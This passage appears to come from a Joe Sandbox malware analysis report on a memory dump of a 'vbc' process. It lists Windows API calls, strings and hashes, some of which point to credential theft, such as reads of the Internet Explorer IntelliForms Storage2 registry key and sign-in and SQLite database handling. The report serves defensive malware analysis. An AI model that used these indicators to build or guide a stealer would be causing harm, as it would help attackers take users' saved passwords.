• LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 00407129
• wcscpy.MSVCRT ref: 00407139

Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd

Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
• Instruction ID: 89f566b746906e4e3228774242dd749435861e54522ca67c51f24cfbd45377e0
• Opcode Fuzzy Hash: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
• Instruction Fuzzy Hash: 2301F231A08114BBEB145B61EC46E9FBB68EB05BA1F20007AF606F41D0DEB96F00969C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407548: GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A998
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A9A8
                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 0040A9B9
                                                                                                                                                      • Part of subcall function 0040A51E: GetPrivateProfileStringW.KERNEL32 ref: 0040A53A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                    • Opcode ID: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                                                                                                                    • Instruction ID: f715108fd1d236bc9ad6a323193eaeb919362f53399fbb1b2bc2ef5a739791b1
                                                                                                                                                    • Opcode Fuzzy Hash: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                                                                                                                    • Instruction Fuzzy Hash: 33F0CD22EC035536E61176221D07F3E25088BA1B66F95447FBD08BA2D3DE7C4A14869E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • unable to open database: %s, xrefs: 0042CFD5
                                                                                                                                                    • out of memory, xrefs: 0042CFEC
                                                                                                                                                    • database is already attached, xrefs: 0042CEA8
                                                                                                                                                    • database %s is already in use, xrefs: 0042CE4F
                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042CDD7
                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042CEF6
                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042CDED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                    • Opcode ID: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                                                                                                                    • Instruction ID: 266062839a895961ad217d8ef2c4278de09ba8d71166d49c3bc68db0563119ae
                                                                                                                                                    • Opcode Fuzzy Hash: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                                                                                                                    • Instruction Fuzzy Hash: BE91C171B00315AFDB20DF69D981B9EBBF1AF04308F64845FE8159B282D778EA41CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B01A
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B036
                                                                                                                                                    • memcpy.MSVCRT ref: 0040B05B
                                                                                                                                                    • memcpy.MSVCRT ref: 0040B06F
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B0F2
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B0FC
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B134
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                                                                                                      • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                                                                                                                      • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                                                                                                      • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                                                                                                      • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                    • String ID: ($d
                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                    • Opcode ID: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                                                                                                                    • Instruction ID: 8a5fa3be38e8e11f26e8e9502e5dff09d3bfeaf4ce2a81799fe883ad29a31388
                                                                                                                                                    • Opcode Fuzzy Hash: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                                                                                                                    • Instruction Fuzzy Hash: 50517872601700AFE728DF2AC586A5AB7E4FF48358F10852EE55ACB791DB74E940CB48
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041510E
                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00415118
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041512A
                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00415202
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                    • Opcode ID: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                                                                                                                    • Instruction ID: 880e68434f8ef122057b7821066ce039c6a6aeb50982fb6198a036ab3cbbf4dd
                                                                                                                                                    • Opcode Fuzzy Hash: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                                                                                                                    • Instruction Fuzzy Hash: 7641F379504B42EFE3228F219C05BEBB7E0EFC0B15F20492FF59556240CBB9D9858E1A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415D77
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00415D7E
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00415D8B
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00415DA0
                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415DA9
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00415DB0
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00415DBD
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00415DD2
                                                                                                                                                    • free.MSVCRT(00000000), ref: 00415DDB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                    • Opcode ID: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                                                                                                                    • Instruction ID: 389b81331b8195f66de6fade72418799adbb9e1ccdce19076b3e4dce97b88e29
                                                                                                                                                    • Opcode Fuzzy Hash: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                                                                                                                    • Instruction Fuzzy Hash: 13118A39500E10DBC6203B747C8D6FF36249BD7B37B21832BF963952D1DA5948C2566A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                    • Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                                                                                                                    • Instruction ID: 1d27d4cf7977f40543be0eb13b72094ec5c0409efe485552fd301264f6eb4def
                                                                                                                                                    • Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                                                                                                                    • Instruction Fuzzy Hash: 570145B6E54260F2FA3024058EE6FF30145CB62754FA40027F88AA02C0A1CD0EE3A29F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
  • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
  • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
  • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
  • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
• memset.MSVCRT ref: 004096C7
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
• _wcsupr.MSVCRT ref: 0040970F
  • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
  • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
  • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
  • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
• memset.MSVCRT ref: 0040975E
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 00409796
Strings
• Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00409674
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
• API String ID: 4131475296-680441574
• Opcode ID: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
• Instruction ID: ced938f56f23152dc4036b8c9c372f29a7907612beabbfd18841790b2154e098
• Opcode Fuzzy Hash: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
• Instruction Fuzzy Hash: F84118B6D4011DABCB10EF99DD85AEFB7BCAF18304F1040AAB504F2191D7749B458BA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
• wcscpy.MSVCRT ref: 0040A076
  • Part of subcall function 0040A4E7: memset.MSVCRT ref: 0040A4FA
  • Part of subcall function 0040A4E7: _itow.MSVCRT ref: 0040A508
• wcslen.MSVCRT ref: 0040A094
• GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
• LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
• memcpy.MSVCRT ref: 0040A10D
  • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409F8D
  • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FAB
  • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FC9
  • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FE7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
• Instruction ID: f88dad89c8a087f2027bd78e20ebd55682c2f8a720c3c381d0e8595ecd4ac891
• Opcode Fuzzy Hash: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
• Instruction Fuzzy Hash: 84419A792003059BD7149F18EC91F323365F76430AB99053AE802A73B2DB79EC22CB1E
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
• Opcode ID: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
• Instruction ID: 9d6a1000cc6d846fb7caa7b95204278ebeb8f13d5a9664e287c5e204bace7976
• Opcode Fuzzy Hash: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
• Instruction Fuzzy Hash: E21177325002197AEB24EB91DD4AE9F77BCEF04750F4040B6F508E1192E7745A51CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: 1c44e7744deb4f42a943bfd88e26940ffc435d901b7e29abb7fabc02dd37aa77
• Instruction ID: 551b55634523189e5c53bd135c739114fe40c1c2f7e89174430398bb56853e76
• Opcode Fuzzy Hash: 1c44e7744deb4f42a943bfd88e26940ffc435d901b7e29abb7fabc02dd37aa77
• Instruction Fuzzy Hash: 54A1DEB1A00606BFDB14CFA4C8517DEBBB0BF04314F14856EE468D7381D778AA95CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 00404DE0
• GetDlgItem.USER32 ref: 00404DF3
• GetDlgItem.USER32 ref: 00404E08
• GetDlgItem.USER32 ref: 00404E20
• EndDialog.USER32(?,00000002), ref: 00404E3C
• EndDialog.USER32(?,00000001), ref: 00404E51
  • Part of subcall function 00404AFB: GetDlgItem.USER32 ref: 00404B08
  • Part of subcall function 00404AFB: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404B1D
• SendDlgItemMessageW.USER32 ref: 00404E69
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00404F7A
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
• Opcode ID: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
• Instruction ID: 9cc36a3a9081561078e880a2f522ad53539937229c5c78969c314d16862aa257
• Opcode Fuzzy Hash: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
• Instruction Fuzzy Hash: DE61D570100705ABDB31AF25C885A2A73B9FF90724F04C63EF615A66E1D778ED50CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00441E61
• _wcsicmp.MSVCRT ref: 00441E76
• _wcsicmp.MSVCRT ref: 00441E8B
  • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
  • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
  • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
• Opcode ID: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
• Instruction ID: 7a979a8a07820355720b76b8412d60638824142cd7e99aea4044fab4cdb489ca
• Opcode Fuzzy Hash: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
• Instruction Fuzzy Hash: A34146755487014AF7309A65898177773E8CB04329F308A2FF86BE26E2EB7CB4C6551E
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: 0e9ce97f1899c70dad5c1b786cff8819ba8fc56cafb55192b5cf30274f9505bc
• Instruction ID: ba4bb41810d6ea78f7103a52efe52e464eccc4a9d5620aafabcd38e7c3fa5a1e
• Opcode Fuzzy Hash: 0e9ce97f1899c70dad5c1b786cff8819ba8fc56cafb55192b5cf30274f9505bc
• Instruction Fuzzy Hash: 2331D3B1501601BFDB24AF69D94692AF7B8FF04304B10813EF145EB291D778EC90CB94
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32 ref: 0040D0E2
• GetWindowRect.USER32 ref: 0040D0F8
• GetWindowRect.USER32 ref: 0040D10B
• BeginDeferWindowPos.USER32 ref: 0040D128
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040D145
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040D165
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040D18C
• EndDeferWindowPos.USER32(?), ref: 0040D195
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Window$Defer$Rect$BeginClient
• String ID:
• API String ID: 2126104762-0
• Opcode ID: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
• Instruction ID: 1b30ad45943261d114c7945feb8e2d934b1f0a15928f611d2c59e033839f0f44
• Opcode Fuzzy Hash: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
• Instruction Fuzzy Hash: 5F21D875900209FFDB11DFA8CD89FEEBBB9FB48701F104164F655A2160C771AA519B24
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • EmptyClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407303
                                                                                                                                                    • wcslen.MSVCRT ref: 00407310
                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040D79F,-00000210), ref: 00407320
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 0040732D
                                                                                                                                                    • memcpy.MSVCRT ref: 00407336
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040733F
                                                                                                                                                    • SetClipboardData.USER32 ref: 00407348
                                                                                                                                                    • CloseClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407358
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                    • Opcode ID: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                                                                                                                    • Instruction ID: e9f640a6ba64593c4f3b5e3a0a2b414f675f529f5a9edaa6aa7e0ad5043136ba
                                                                                                                                                    • Opcode Fuzzy Hash: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                                                                                                                    • Instruction Fuzzy Hash: 14F0B43B5002187BD2102FE5AC4DE1B772CEB86F97B050179FA09D2251DE749E0486B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404BDE
                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404BF7
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404C04
                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404C10
                                                                                                                                                    • memset.MSVCRT ref: 00404C74
                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00404CA9
                                                                                                                                                    • SetFocus.USER32(?), ref: 00404D2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                    • Opcode ID: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                                                                                                                    • Instruction ID: e15596ac8dd535375262745d85448c61c7cc278dece76afc2af43b7580886122
                                                                                                                                                    • Opcode Fuzzy Hash: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                                                                                                                    • Instruction Fuzzy Hash: 8B417C70901219BBDB20DF95CD85DAFBFB8FF08755F10406AF509A6291D3749E40CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                    • wcscat.MSVCRT ref: 0040BE5B
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040BE82
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite_snwprintfwcscatwcslen
                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                    • API String ID: 2451617256-4153097237
                                                                                                                                                    • Opcode ID: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                                                                                                                    • Instruction ID: be6843ca6d8e3427859c99e4dc5891dee3dff4c22b8a3cb8274265ecf8740657
                                                                                                                                                    • Opcode Fuzzy Hash: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                                                                                                                    • Instruction Fuzzy Hash: BC31A031900208EFDF04AF55CC86EEE7B75FF44320F10416AE905AB1E2DB75AA51DB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                    • String ID: 0$6
                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                    • Opcode ID: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                                                                                                                    • Instruction ID: 6379b183058c7bfcb2c9996af6a46f5bf8fbaffb9494aead0661b6c96fd4ce8b
                                                                                                                                                    • Opcode Fuzzy Hash: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                                                                                                                    • Instruction Fuzzy Hash: FF219A72505340ABD721DF55C84599BB7F8FB84745F044A3FFA84A2280E7B6CA10CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
